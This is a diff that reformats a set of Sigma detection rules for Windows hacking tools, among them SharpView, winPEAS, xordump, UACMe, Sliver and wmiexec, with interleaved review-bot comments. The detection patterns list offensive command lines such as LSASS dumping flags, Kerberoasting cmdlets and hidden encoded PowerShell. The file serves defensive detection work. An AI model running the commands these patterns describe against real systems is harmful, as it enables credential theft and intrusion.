@@ -1,11 +1,10 @@
title: HackTool - SharpEvtMute Execution
id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c
related:
- - id: 49329257-089d-46e6-af37-4afce4290685
- type: similar
+ - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load
+ type: similar
status: test
-description: Detects the use of SharpEvtHook, a tool that tampers with the Windows
- event logs
+description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
references:
- https://github.com/bats3c/EvtMute
author: Florian Roth (Nextron Systems)
@@ -22,11 +21,11 @@ detection:
EventID: 4688
Channel: Security
selection:
- - NewProcessName|endswith: \SharpEvtMute.exe
- - Description: SharpEvtMute
- - CommandLine|contains:
- - '--Filter "rule '
- - --Encoded --Filter \"
+ - NewProcessName|endswith: \SharpEvtMute.exe
+ - Description: SharpEvtMute
+ - CommandLine|contains:
+ - '--Filter "rule '
+ - --Encoded --Filter \"
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml
index 0b9e21c98..c13ae986b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml
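Review bot: The re-joined description line in the first SharpEvtMute hunk still names "SharpEvtHook", while the title, the `NewProcessName|endswith: \SharpEvtMute.exe` selection and the `Description: SharpEvtMute` alternative all refer to SharpEvtMute; this looks like a typo carried over from upstream rather than a different tool. Since the line is rewritten anyway, I would correct it to `description: Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs`. The `# DLL load` annotation on the related rule id is a useful addition and could be kept as is.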
@@ -1,8 +1,7 @@
title: HackTool - SharpLdapWhoami Execution
id: d9367cbb-c2e0-47ce-bdc0-128cb6da898d
status: test
-description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service
- on a domain controller
+description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
references:
- https://github.com/bugch3ck/SharpLdapWhoami
author: Florian Roth (Nextron Systems)
@@ -20,12 +19,12 @@ detection:
EventID: 4688
Channel: Security
selection_name:
- NewProcessName|endswith: \SharpLdapWhoami.exe
- selection_pe:
- - OriginalFileName|contains: SharpLdapWhoami
- - Product: SharpLdapWhoami
+ NewProcessName|endswith: \SharpLdapWhoami.exe
+ selection_pe: # in case the file has been renamed after compilation
+ - OriginalFileName|contains: SharpLdapWhoami
+ - Product: SharpLdapWhoami
selection_flags1:
- CommandLine|endswith:
+ CommandLine|endswith:
- ' /method:ntlm'
- ' /method:kerb'
- ' /method:nego'
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml
index 84804b55a..c5ef25e84 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml
@@ -20,16 +20,16 @@ detection:
EventID: 4688
Channel: Security
selection:
- - NewProcessName|endswith: \SharpUp.exe
- - Description: SharpUp
- - CommandLine|contains:
- - HijackablePaths
- - UnquotedServicePath
- - ProcessDLLHijack
- - ModifiableServiceBinaries
- - ModifiableScheduledTask
- - DomainGPPPassword
- - CachedGPPPassword
+ - NewProcessName|endswith: \SharpUp.exe
+ - Description: SharpUp
+ - CommandLine|contains:
+ - HijackablePaths
+ - UnquotedServicePath
+ - ProcessDLLHijack
+ - ModifiableServiceBinaries
+ - ModifiableScheduledTask
+ - DomainGPPPassword
+ - CachedGPPPassword
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml
index be01b9e6e..abe711417 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml
@@ -1,11 +1,10 @@
title: HackTool - SharpView Execution
id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d
related:
- - id: dcd74b95-3f36-4ed9-9598-0490951643aa
- type: similar
+ - id: dcd74b95-3f36-4ed9-9598-0490951643aa
+ type: similar
status: test
-description: Adversaries may look for details about the network configuration and
- settings of systems they access or through information discovery of remote systems
+description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
references:
- https://github.com/tevora-threat/SharpView/
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
@@ -28,91 +27,117 @@ detection:
EventID: 4688
Channel: Security
selection:
- - OriginalFileName: SharpView.exe
- - NewProcessName|endswith: \SharpView.exe
- - CommandLine|contains:
- - Add-RemoteConnection
- - Convert-ADName
- - ConvertFrom-SID
- - ConvertFrom-UACValue
- - Convert-SidToName
- - Export-PowerViewCSV
- - Find-DomainObjectPropertyOutlier
- - Find-DomainProcess
- - Find-DomainShare
- - Find-DomainUserEvent
- - Find-DomainUserLocation
- - Find-ForeignGroup
- - Find-ForeignUser
- - Find-GPOComputerAdmin
- - Find-GPOLocation
- - Find-Interesting
- - Find-LocalAdminAccess
- - Find-ManagedSecurityGroups
- - Get-CachedRDPConnection
- - Get-DFSshare
- - Get-DomainComputer
- - Get-DomainController
- - Get-DomainDFSShare
- - Get-DomainDNSRecord
- - Get-DomainFileServer
- - Get-DomainForeign
- - Get-DomainGPO
- - Get-DomainGroup
- - Get-DomainGUIDMap
- - Get-DomainManagedSecurityGroup
- - Get-DomainObject
- - Get-DomainOU
- - Get-DomainPolicy
- - Get-DomainSID
- - Get-DomainSite
- - Get-DomainSPNTicket
- - Get-DomainSubnet
- - Get-DomainTrust
- - Get-DomainUserEvent
- - Get-ForestDomain
- - Get-ForestGlobalCatalog
- - Get-ForestTrust
- - Get-GptTmpl
- - Get-GroupsXML
- - Get-LastLoggedOn
- - Get-LoggedOnLocal
- - Get-NetComputer
- - Get-NetDomain
- - Get-NetFileServer
- - Get-NetForest
- - Get-NetGPO
- - Get-NetGroupMember
- - Get-NetLocalGroup
- - Get-NetLoggedon
- - Get-NetOU
- - Get-NetProcess
- - Get-NetRDPSession
- - Get-NetSession
- - Get-NetShare
- - Get-NetSite
- - Get-NetSubnet
- - Get-NetUser
- - Get-PathAcl
- - Get-PrincipalContext
- - Get-RegistryMountedDrive
- - Get-RegLoggedOn
- - Get-WMIRegCachedRDPConnection
- - Get-WMIRegLastLoggedOn
- - Get-WMIRegMountedDrive
- - Get-WMIRegProxy
- - Invoke-ACLScanner
- - Invoke-CheckLocalAdminAccess
- - Invoke-Kerberoast
- - Invoke-MapDomainTrust
- - Invoke-RevertToSelf
- - Invoke-Sharefinder
- - Invoke-UserImpersonation
- - Remove-DomainObjectAcl
- - Remove-RemoteConnection
- - Request-SPNTicket
- - 
Set-DomainObject
- - Test-AdminAccess
+ - OriginalFileName: SharpView.exe
+ - NewProcessName|endswith: \SharpView.exe
+ - CommandLine|contains:
+ # - 'Add-DomainGroupMember'
+ # - 'Add-DomainObjectAcl'
+ # - 'Add-ObjectAcl'
+ - Add-RemoteConnection
+ - Convert-ADName
+ - ConvertFrom-SID
+ - ConvertFrom-UACValue
+ - Convert-SidToName
+ # - 'ConvertTo-SID'
+ - Export-PowerViewCSV
+ # - 'Find-DomainLocalGroupMember'
+ - Find-DomainObjectPropertyOutlier
+ - Find-DomainProcess
+ - Find-DomainShare
+ - Find-DomainUserEvent
+ - Find-DomainUserLocation
+ - Find-ForeignGroup
+ - Find-ForeignUser
+ - Find-GPOComputerAdmin
+ - Find-GPOLocation
+ - Find-Interesting # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile'
+ - Find-LocalAdminAccess
+ - Find-ManagedSecurityGroups
+ # - 'Get-ADObject'
+ - Get-CachedRDPConnection
+ - Get-DFSshare
+ # - 'Get-DNSRecord'
+ # - 'Get-DNSZone'
+ # - 'Get-Domain'
+ - Get-DomainComputer
+ - Get-DomainController
+ - Get-DomainDFSShare
+ - Get-DomainDNSRecord
+ # - 'Get-DomainDNSZone'
+ - Get-DomainFileServer
+ - Get-DomainForeign # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser'
+ - Get-DomainGPO # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping'
+ - Get-DomainGroup # 'Get-DomainGroupMember'
+ - Get-DomainGUIDMap
+ - Get-DomainManagedSecurityGroup
+ - Get-DomainObject # 'Get-DomainObjectAcl'
+ - Get-DomainOU
+ - Get-DomainPolicy # 'Get-DomainPolicyData'
+ - Get-DomainSID
+ - Get-DomainSite
+ - Get-DomainSPNTicket
+ - Get-DomainSubnet
+ - Get-DomainTrust # 'Get-DomainTrustMapping'
+ # - 'Get-DomainUser'
+ - Get-DomainUserEvent
+ # - 'Get-Forest'
+ - Get-ForestDomain
+ - Get-ForestGlobalCatalog
+ - Get-ForestTrust
+ - Get-GptTmpl
+ - Get-GroupsXML
+ # - 'Get-GUIDMap'
+ # - 'Get-IniContent'
+ # - 'Get-IPAddress'
+ - Get-LastLoggedOn
+ - Get-LoggedOnLocal
+ - Get-NetComputer # 'Get-NetComputerSiteName'
+ - Get-NetDomain # 'Get-NetDomainController', 
'Get-NetDomainTrust'
+ - Get-NetFileServer
+ - Get-NetForest # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust'
+ - Get-NetGPO # 'Get-NetGPOGroup'
+ # - 'Get-NetGroup'
+ - Get-NetGroupMember
+ - Get-NetLocalGroup # 'Get-NetLocalGroupMember'
+ - Get-NetLoggedon
+ - Get-NetOU
+ - Get-NetProcess
+ - Get-NetRDPSession
+ - Get-NetSession
+ - Get-NetShare
+ - Get-NetSite
+ - Get-NetSubnet
+ - Get-NetUser
+ # - 'Get-ObjectAcl'
+ - Get-PathAcl
+ - Get-PrincipalContext
+ # - 'Get-Proxy'
+ - Get-RegistryMountedDrive
+ - Get-RegLoggedOn
+ # - 'Get-SiteName'
+ # - 'Get-UserEvent'
+ # - 'Get-WMIProcess'
+ - Get-WMIRegCachedRDPConnection
+ - Get-WMIRegLastLoggedOn
+ - Get-WMIRegMountedDrive
+ - Get-WMIRegProxy
+ - Invoke-ACLScanner
+ - Invoke-CheckLocalAdminAccess
+ - Invoke-Kerberoast
+ - Invoke-MapDomainTrust
+ - Invoke-RevertToSelf
+ - Invoke-Sharefinder
+ - Invoke-UserImpersonation
+ # - 'New-DomainGroup'
+ # - 'New-DomainUser'
+ - Remove-DomainObjectAcl
+ - Remove-RemoteConnection
+ - Request-SPNTicket
+ # - 'Resolve-IPAddress'
+ # - 'Set-ADObject'
+ - Set-DomainObject
+ # - 'Set-DomainUserPassword'
+ - Test-AdminAccess
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml
index dcc81a426..b020be03c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml
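Review bot: The many `# - '…'` entries added to the SharpView `CommandLine|contains` list carry no note saying why those cmdlet names are excluded from matching, so a future maintainer cannot tell whether they were dropped for false positives, because they are generic, or by oversight; `falsepositives` still says `Unknown`, which does not help either. I would add one line above the list, e.g. `# Commented-out cmdlets are deliberately excluded from matching; see <tracking issue/PR placeholder> for the rationale`, and fill in the real reference. The inline annotations such as `# 'Get-DomainObjectAcl'` next to `Get-DomainObject` are helpful because `contains` on the shorter name already covers the longer ones; a short comment stating that prefix-matching intent once, at the top of the list, would make the pattern explicit. The hunk begins on an earlier line of this page and is reviewed as a whole.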
@@ -1,8 +1,7 @@
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
-description: Detects process activity patterns as seen being used by Sliver C2 framework
- implants
+description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
@@ -20,7 +19,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8
+ CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml
index 64e949335..94051164e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml
@@ -1,9 +1,7 @@
title: HackTool - Stracciatella Execution
id: 7a4d9232-92fc-404d-8ce1-4c92e7caf539
status: experimental
-description: Detects Stracciatella which executes a Powershell runspace from within
- C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled
- based on PE metadata characteristics.
+description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
references:
- https://github.com/mgeeky/Stracciatella
author: pH-T (Nextron Systems)
@@ -21,17 +19,18 @@ detection:
EventID: 4688
Channel: Security
selection:
- - NewProcessName|endswith: \Stracciatella.exe
- - OriginalFileName: Stracciatella.exe
- - Description: Stracciatella
- - Hashes|contains:
- - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956
- - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a
- - sha256:
- - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956
- - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a
+ - NewProcessName|endswith: \Stracciatella.exe
+ - OriginalFileName: Stracciatella.exe
+ - Description: Stracciatella
+ - Hashes|contains:
+ - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956
+ - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a
+ - sha256:
+ - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956
+ - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a
condition: process_creation and selection
falsepositives:
- Unlikely
level: high
+ ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml
index 7dbf43257..cbddd2d16 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml
@@ -19,14 +19,14 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- NewProcessName|endswith: \SysmonEOP.exe
+ NewProcessName|endswith: \SysmonEOP.exe
selection_hash:
- - Hashes:
- - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5
- - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC
- - Imphash:
- - 22f4089eb8aba31e1bb162c6d9bf72e5
- - 5123fa4c4384d431cd0d893eeb49bbec
+ - Hashes:
+ - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5
+ - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC
+ - Imphash:
+ - 22f4089eb8aba31e1bb162c6d9bf72e5
+ - 5123fa4c4384d431cd0d893eeb49bbec
condition: process_creation and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml
index 35354d6fe..4dcc11277 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml
@@ -1,8 +1,7 @@
title: HackTool - TruffleSnout Execution
id: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a
status: test
-description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit
- for offensive operators, situational awareness and targeted low noise enumeration.
+description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md
- https://github.com/dsnezhkov/TruffleSnout
@@ -21,8 +20,8 @@ detection:
EventID: 4688
Channel: Security
selection:
- - OriginalFileName: TruffleSnout.exe
- - NewProcessName|endswith: \TruffleSnout.exe
+ - OriginalFileName: TruffleSnout.exe
+ - NewProcessName|endswith: \TruffleSnout.exe
condition: process_creation and selection
falsepositives:
- Unknown
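Review bot: In the SysmonEOP `selection_hash` block the re-indented `- Hashes:` alternative is an exact-match field test, whereas the sibling rules in this same patch (SelectMyParent, WCE, Stracciatella) use `Hashes|contains` for the very same `IMPHASH=…` values, and the WCE hunk even adds the comment "Sysmon field hashes contains all types". An exact match against a value that normally holds several comma-separated hash types would, as far as I can tell, only hit when Sysmon is configured to emit the IMPHASH alone, so the converted rule is weaker than its siblings without an obvious reason. I would change the line to `- Hashes|contains:` so the two hash alternatives behave the same way, or add a comment stating why an exact match is intended here.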
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml
index 2fa2874fe..c1b63272e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml
@@ -1,8 +1,7 @@
title: HackTool - UACMe Akagi Execution
id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177
status: test
-description: Detects the execution of UACMe, a tool used for UAC bypasses, via default
- PE metadata
+description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
references:
- https://github.com/hfiref0x/UACME
author: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)
@@ -20,21 +19,21 @@ detection:
EventID: 4688
Channel: Security
selection_pe:
- - Product: UACMe
- - Company:
- - REvol Corp
- - APT 92
- - UG North
- - Hazardous Environments
- - CD Project Rekt
- - Description:
- - UACMe main module
- - Pentesting utility
- - OriginalFileName:
- - Akagi.exe
- - Akagi64.exe
+ - Product: UACMe
+ - Company:
+ - REvol Corp
+ - APT 92
+ - UG North
+ - Hazardous Environments
+ - CD Project Rekt
+ - Description:
+ - UACMe main module
+ - Pentesting utility
+ - OriginalFileName:
+ - Akagi.exe
+ - Akagi64.exe
selection_img:
- NewProcessName|endswith:
+ NewProcessName|endswith:
- \Akagi64.exe
- \Akagi.exe
selection_hashes_sysmon:
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml
index f432e57e1..a58e48c66 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml
@@ -19,17 +19,17 @@ detection:
EventID: 4688
Channel: Security
selection_1:
- - Imphash:
- - a53a02b997935fd8eedcb5f7abab9b9f
- - e96a73c7bf33a464c510ede582318bf2
- - Hashes|contains:
- - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f
- - IMPHASH=e96a73c7bf33a464c510ede582318bf2
+ - Imphash:
+ - a53a02b997935fd8eedcb5f7abab9b9f
+ - e96a73c7bf33a464c510ede582318bf2
+ - Hashes|contains: # Sysmon field hashes contains all types
+ - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f
+ - IMPHASH=e96a73c7bf33a464c510ede582318bf2
selection_2:
- CommandLine|endswith: .exe -S
+ CommandLine|endswith: .exe -S
ParentProcessName|endswith: \services.exe
filter:
- NewProcessName|endswith: \clussvc.exe
+ NewProcessName|endswith: \clussvc.exe
condition: process_creation and (1 of selection_* and not filter)
falsepositives:
- Another service that uses a single -s command line switch
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml
index 89a4d4f4d..99086fac2 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml
@@ -1,8 +1,7 @@
title: HackTool - winPEAS Execution
id: 98b53e78-ebaf-46f8-be06-421aafd176d9
status: experimental
-description: WinPEAS is a script that search for possible paths to escalate privileges
- on Windows hosts. The checks are explained on book.hacktricks.xyz
+description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
references:
- https://github.com/carlospolop/PEASS-ng
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
@@ -22,29 +21,29 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - OriginalFileName: winPEAS.exe
- - NewProcessName|endswith:
- - \winPEASany_ofs.exe
- - \winPEASany.exe
- - \winPEASx64_ofs.exe
- - \winPEASx64.exe
- - \winPEASx86_ofs.exe
- - \winPEASx86.exe
+ - OriginalFileName: winPEAS.exe
+ - NewProcessName|endswith:
+ - \winPEASany_ofs.exe
+ - \winPEASany.exe
+ - \winPEASx64_ofs.exe
+ - \winPEASx64.exe
+ - \winPEASx86_ofs.exe
+ - \winPEASx86.exe
selection_cli_option:
- CommandLine|contains:
- - ' applicationsinfo'
- - ' browserinfo'
- - ' eventsinfo'
- - ' fileanalysis'
- - ' filesinfo'
- - ' processinfo'
- - ' servicesinfo'
- - ' windowscreds'
+ CommandLine|contains:
+ - ' applicationsinfo' # Search installed applications information
+ - ' browserinfo' # Search browser information
+ - ' eventsinfo' # Display interesting events information
+ - ' fileanalysis' # Search specific files that can contains credentials and for regexes inside files
+ - ' filesinfo' # Search generic files that can contains credentials
+ - ' processinfo' # Search processes information
+ - ' servicesinfo' # Search services information
+ - ' windowscreds' # Search windows credentials
selection_cli_dl:
- CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/
+ CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/
selection_cli_specific:
- - ParentCommandLine|endswith: ' -linpeas'
- - CommandLine|endswith: ' -linpeas'
+ - ParentCommandLine|endswith: ' -linpeas'
+ - CommandLine|endswith: ' -linpeas'
condition: process_creation and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml
index a6b13fb2e..9b61901c6 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml
@@ -1,13 +1,11 @@
title: HackTool - WinPwn Execution
id: d557dc06-62e8-4468-a8e8-7984124908ce
related:
- - id: 851fd622-b675-4d26-b803-14bc7baa517a
- type: similar
+ - id: 851fd622-b675-4d26-b803-14bc7baa517a
+ type: similar
status: experimental
-description: 'Detects commandline keywords indicative of potential usge of the tool
- WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
- '
+description: |
+ Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
author: Swachchhanda Shrawan Poudel
date: 2023/12/04
references:
@@ -38,7 +36,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- Offline_Winpwn
- 'WinPwn '
- WinPwn.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml
index 34dad0bde..876b15a58 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml
@@ -1,8 +1,7 @@
title: HackTool - Wmiexec Default Powershell Command
id: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0
status: experimental
-description: Detects the execution of PowerShell with a specific flag sequence that
- is used by the Wmiexec script
+description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
references:
- https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
author: Nasreddine Bencherchali (Nextron Systems)
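Review bot: The rewritten WinPwn description keeps the misspelling "usge" from the old quoted scalar, so the text that ships in the new block scalar still reads "potential usge of the tool WinPwn". Since the line is being rewritten anyway, I would fix it at the same time: `Detects commandline keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.`. Switching to a `|` block scalar is otherwise a sensible way to drop the stray trailing empty line the old quoted form carried.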
@@ -18,7 +17,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc
+ CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml
index 79d078d1b..c3fd1d118 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml
@@ -19,12 +19,12 @@ detection:
EventID: 4688
Channel: Security
selection:
- - NewProcessName|endswith: \xordump.exe
- - CommandLine|contains:
- - ' -process lsass.exe '
- - ' -m comsvcs '
- - ' -m dbghelp '
- - ' -m dbgcore '
+ - NewProcessName|endswith: \xordump.exe
+ - CommandLine|contains:
+ - ' -process lsass.exe '
+ - ' -m comsvcs '
+ - ' -m dbghelp '
+ - ' -m dbgcore '
condition: process_creation and selection
falsepositives:
- Another tool that uses the command line switches of XORdump
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml
index a3bade22b..ee90982b9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml
@@ -1,8 +1,7 @@
title: Suspicious ZipExec Execution
id: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132
status: test
-description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into
- a password-protected zip file.
+description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
references:
- https://twitter.com/SBousseaden/status/1451237393017839616
- https://github.com/Tylous/ZipExec
@@ -22,13 +21,13 @@ detection:
EventID: 4688
Channel: Security
run:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- /generic:Microsoft_Windows_Shell_ZipFolder:filename=
- .zip
- '/pass:'
- '/user:'
delete:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- /delete
- Microsoft_Windows_Shell_ZipFolder:filename=
- .zip
diff --git a/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml
index 56c388979..9acbc3f45 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml
@@ -18,7 +18,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- NewProcessName|endswith: \HOSTNAME.EXE
+ NewProcessName|endswith: \HOSTNAME.EXE
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml b/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml
index ce4cf96c5..44d5ddce4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml
@@ -1,8 +1,7 @@
title: Suspicious HWP Sub Processes
id: 023394c4-29d5-46ab-92b8-6a534c6f447b
status: test
-description: Detects suspicious Hangul Word Processor (Hanword) sub processes that
- could indicate an exploitation
+description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
references:
- https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/
- https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1
@@ -28,7 +27,7 @@ detection:
Channel: Security
selection:
ParentProcessName|endswith: \Hwp.exe
- NewProcessName|endswith: \gbb.exe
+ NewProcessName|endswith: \gbb.exe
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml b/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml
index 7ad0e01ef..b3e1e1723 100644
--- a/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml
@@ -1,8 +1,7 @@
title: Use Icacls to Hide File to Everyone
id: 4ae81040-fc1c-4249-bfa3-938d260214d9
status: test
-description: Detect use of icacls to deny access for everyone in Users folder sometimes
- used to hide malicious files
+description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
references:
